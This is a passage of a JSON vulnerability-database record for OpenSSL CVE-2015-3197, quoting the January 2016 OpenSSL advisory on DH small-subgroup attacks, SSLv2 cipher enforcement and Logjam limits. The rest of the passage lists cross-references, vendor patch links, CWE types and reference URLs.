\"safe\"\nprimes. More recently (in version 1.0.2) support was provided for generating\nX9.42 style parameter files such as those required for RFC 5114 support. The\nprimes used in such files may not be \"safe\". Where an application is using DH\nconfigured with parameters based on primes that are not \"safe\" then an attacker\ncould use this fact to find a peer\u0027s private DH exponent. This attack requires\nthat the attacker complete multiple handshakes in which the peer uses the same\nprivate DH exponent. For example this could be used to discover a TLS server\u0027s\nprivate DH exponent if it\u0027s reusing the private DH exponent or it\u0027s using a\nstatic DH ciphersuite. \n\nOpenSSL provides the option SSL_OP_SINGLE_DH_USE for ephemeral DH (DHE) in TLS. \nIt is not on by default. If the option is not set then the server reuses the\nsame private DH exponent for the life of the server process and would be\nvulnerable to this attack. It is believed that many popular applications do set\nthis option and would therefore not be at risk. \n\nOpenSSL before 1.0.2f will reuse the key if:\n- SSL_CTX_set_tmp_dh()/SSL_set_tmp_dh() is used and SSL_OP_SINGLE_DH_USE is not\n  set. \n- SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used, and both the\n  parameters and the key are set and SSL_OP_SINGLE_DH_USE is not used. This is\n  an undocumted feature and parameter files don\u0027t contain the key. \n- Static DH ciphersuites are used. The key is part of the certificate and\n  so it will always reuse it. This is only supported in 1.0.2. \n\nIt will not reuse the key for DHE ciphers suites if:\n- SSL_OP_SINGLE_DH_USE is set\n- SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used and the\n  callback does not provide the key, only the parameters. The callback is\n  almost always used like this. \n\nNon-safe primes are generated by OpenSSL when using:\n- genpkey with the dh_rfc5114 option. This will write an X9.42 style file\n  including the prime-order subgroup size \"q\". This is supported since the 1.0.2\n  version. Older versions can\u0027t read files generated in this way. \n- dhparam with the -dsaparam option. This has always been documented as\n  requiring the single use. \n\nThe fix for this issue adds an additional check where a \"q\" parameter is\navailable (as is the case in X9.42 based parameters). This detects the\nonly known attack, and is the only possible defense for static DH ciphersuites. \nThis could have some performance impact. \n\nAdditionally the SSL_OP_SINGLE_DH_USE option has been switched on by default\nand cannot be disabled. This could have some performance impact. \n\nThis issue affects OpenSSL version 1.0.2. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2f\n\nOpenSSL 1.0.1 is not affected by this CVE because it does not support X9.42\nbased parameters. It is possible to generate parameters using non \"safe\" primes,\nbut this option has always been documented as requiring single use and is not\nthe default or believed to be common. However, as a precaution, the\nSSL_OP_SINGLE_DH_USE change has also been backported to 1.0.1r. \n\nThis issue was reported to OpenSSL on 12 January 2016 by Antonio Sanso (Adobe). \nThe fix was developed by Matt Caswell of the OpenSSL development team\n(incorporating some work originally written by Stephen Henson of the OpenSSL\ncore team). \n\nSSLv2 doesn\u0027t block disabled ciphers (CVE-2015-3197)\n====================================================\n\nSeverity: Low\n\nA malicious client can negotiate SSLv2 ciphers that have been disabled on the\nserver and complete SSLv2 handshakes even if all SSLv2 ciphers have been\ndisabled, provided that the SSLv2 protocol was not also disabled via\nSSL_OP_NO_SSLv2. \n\nThis issue affects OpenSSL versions 1.0.2 and 1.0.1. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2f\nOpenSSL 1.0.1 users should upgrade to 1.0.1r\n\nThis issue was reported to OpenSSL on 26th December 2015 by Nimrod Aviram and\nSebastian Schinzel. The fix was developed by Nimrod Aviram with further\ndevelopment by Viktor Dukhovni of the OpenSSL development team. \n\n\nAn update on DHE man-in-the-middle protection (Logjam)\n====================================================================\n\nA previously published vulnerability in the TLS protocol allows a\nman-in-the-middle attacker to downgrade vulnerable TLS connections\nusing ephemeral Diffie-Hellman key exchange to 512-bit export-grade\ncryptography. This vulnerability is known as Logjam\n(CVE-2015-4000). OpenSSL added Logjam mitigation for TLS clients by\nrejecting handshakes with DH parameters shorter than 768 bits in\nreleases 1.0.2b and 1.0.1n. \n\nThis limit has been increased to 1024 bits in this release, to offer\nstronger cryptographic assurance for all TLS connections using\nephemeral Diffie-Hellman key exchange. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2f\nOpenSSL 1.0.1 users should upgrade to 1.0.1r\n\nThe fix was developed by Kurt Roeckx of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are\nadvised to upgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions\nare no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160128.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      },
      {
        "db": "CERT/CC",
        "id": "VU#257823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "BID",
        "id": "82237"
      },
      {
        "db": "BID",
        "id": "74491"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "db": "PACKETSTORM",
        "id": "136213"
      },
      {
        "db": "PACKETSTORM",
        "id": "141101"
      },
      {
        "db": "PACKETSTORM",
        "id": "135596"
      },
      {
        "db": "PACKETSTORM",
        "id": "136032"
      },
      {
        "db": "PACKETSTORM",
        "id": "135515"
      },
      {
        "db": "PACKETSTORM",
        "id": "136034"
      },
      {
        "db": "PACKETSTORM",
        "id": "136132"
      },
      {
        "db": "PACKETSTORM",
        "id": "169661"
      }
    ],
    "trust": 3.69
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-3197",
        "trust": 3.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#257823",
        "trust": 3.6
      },
      {
        "db": "BID",
        "id": "82237",
        "trust": 2.0
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "91787",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1034849",
        "trust": 1.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10759",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU95668716",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985",
        "trust": 0.8
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026",
        "trust": 0.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#583776",
        "trust": 0.3
      },
      {
        "db": "MCAFEE",
        "id": "SB10203",
        "trust": 0.3
      },
      {
        "db": "BID",
        "id": "74491",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-349-21",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3197",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136213",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "141101",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135596",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136032",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135515",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136034",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136132",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169661",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#257823"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "db": "BID",
        "id": "82237"
      },
      {
        "db": "BID",
        "id": "74491"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "PACKETSTORM",
        "id": "136213"
      },
      {
        "db": "PACKETSTORM",
        "id": "141101"
      },
      {
        "db": "PACKETSTORM",
        "id": "135596"
      },
      {
        "db": "PACKETSTORM",
        "id": "136032"
      },
      {
        "db": "PACKETSTORM",
        "id": "135515"
      },
      {
        "db": "PACKETSTORM",
        "id": "136034"
      },
      {
        "db": "PACKETSTORM",
        "id": "136132"
      },
      {
        "db": "PACKETSTORM",
        "id": "169661"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "id": "VAR-201602-0272",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.535906682
  },
  "last_update_date": "2024-07-23T21:05:01.067000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HS16-015",
        "trust": 0.8,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs16-015/index.html"
      },
      {
        "title": "NV16-007",
        "trust": 0.8,
        "url": "http://jpn.nec.com/security-info/secinfo/nv16-007.html"
      },
      {
        "title": "LibreSSL 2.3.2 Release Notes",
        "trust": 0.8,
        "url": "http://ftp.openbsd.org/pub/openbsd/libressl/libressl-2.3.2-relnotes.txt"
      },
      {
        "title": "LibreSSL 2.2.6 Release Notes",
        "trust": 0.8,
        "url": "http://ftp.openbsd.org/pub/openbsd/libressl/libressl-2.2.6-relnotes.txt"
      },
      {
        "title": "Better SSLv2 cipher-suite enforcement",
        "trust": 0.8,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=d81a1600588b726c2bdccda7efad3cc7a87d6245"
      },
      {
        "title": "SSLv2 doesn\u0027t block disabled ciphers (CVE-2015-3197)",
        "trust": 0.8,
        "url": "https://mta.openssl.org/pipermail/openssl-announce/2016-january/000061.html"
      },
      {
        "title": "Oracle Critical Patch Update CVSS V2 Risk Matrices - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - April 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016verbose-2881709.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
      },
      {
        "title": "Oracle Linux Bulletin - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
      },
      {
        "title": "Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "title": "April 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/april_2016_critical_patch_update"
      },
      {
        "title": "October 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update"
      },
      {
        "title": "July 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
      },
      {
        "title": "TLSA-2016-6",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-6j.html"
      },
      {
        "title": "HS16-015",
        "trust": 0.8,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-015/index.html"
      },
      {
        "title": "OpenSSL Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=60033"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2016/01/29/openssl_patch_quashes_rare_https_nasty_shores_up_crypto_chops/"
      },
      {
        "title": "Red Hat: CVE-2015-3197",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-3197"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160129-openssl"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2016-682",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-682"
      },
      {
        "title": "Symantec Security Advisories: SA111 : OpenSSL Vulnerabilities 28-Jan-2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=83d562565218abbdbef42ef8962d127b"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2016-661",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-661"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-3197 "
      },
      {
        "title": "changelog",
        "trust": 0.1,
        "url": "https://github.com/halon/changelog "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/imhunterand/hackerone-publicy-disclosed "
      },
      {
        "title": "satellite-host-cve",
        "trust": 0.1,
        "url": "https://github.com/redhatsatellite/satellite-host-cve "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-310",
        "trust": 1.8
      },
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "https://www.kb.cert.org/vuls/id/257823"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.openssl.org/news/secadv/20160128.txt"
      },
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/201601-05"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/91787"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/82237"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00003.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00010.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00007.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00009.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00001.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00017.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00004.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00025.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00002.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00006.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00038.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00012.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-16:11.openssl.asc"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03724en_us"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390893"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1034849"
      },
      {
        "trust": 1.7,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176373.html"
      },
      {
        "trust": 1.4,
        "url": "https://mta.openssl.org/pipermail/openssl-announce/2016-january/000061.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.openssl.org/news/vulnerabilities.html#y2016"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=d81a1600588b726c2bdccda7efad3cc7a87d6245"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3197"
      },
      {
        "trust": 0.8,
        "url": "http://intothesymmetry.blogspot.com/2016/01/openssl-key-recovery-attack-on-dh-small.html"
      },
      {
        "trust": 0.8,
        "url": "http://tools.ietf.org/html/rfc5114"
      },
      {
        "trust": 0.8,
        "url": "http://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.42-2003+%28r2013%29"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu95668716/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3197"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3197"
      },
      {
        "trust": 0.6,
        "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-002-openssl/?q=cve-2015-3197\u0026l=en_us\u0026fs=search\u0026pn=1"
      },
      {
        "trust": 0.6,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=d81a1600588b726c2bdccda7efad3cc7a87d6245"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2015-3197"
      },
      {
        "trust": 0.5,
        "url": "https://openssl.org/news/secadv/20160128.txt"
      },
      {
        "trust": 0.4,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2015-0293"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2016-0800"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0800"
      },
      {
        "trust": 0.3,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.3,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160129-openssl"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html"
      },
      {
        "trust": 0.3,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10203"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory17.asc"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023433"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023836"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023987"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099307"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021143"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021265"
      },
      {
        "trust": 0.3,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:11.openssl.asc"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0303.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0379.html"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005820"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009610"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976345"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21976356"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977014"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977018"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21977144"
      },
      {
        "trust": 0.3,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21978361"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978438"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978941"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979086"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979209"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980207"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980965"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980969"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981438"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982099"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982336"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982697"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984601"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985213"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985698"
      },
      {
        "trust": 0.3,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21987174"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987175"
      },
      {
        "trust": 0.3,
        "url": "http://www.kb.cert.org/vuls/id/583776"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979476"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/"
      },
      {
        "trust": 0.3,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=38591"
      },
      {
        "trust": 0.3,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150506-ucsc"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0701"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/2176731"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0704"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-0704"
      },
      {
        "trust": 0.3,
        "url": "https://openssl.org/news/secadv/20160301.txt"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-0703"
      },
      {
        "trust": 0.3,
        "url": "https://drownattack.com/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0703"
      },
      {
        "trust": 0.1,
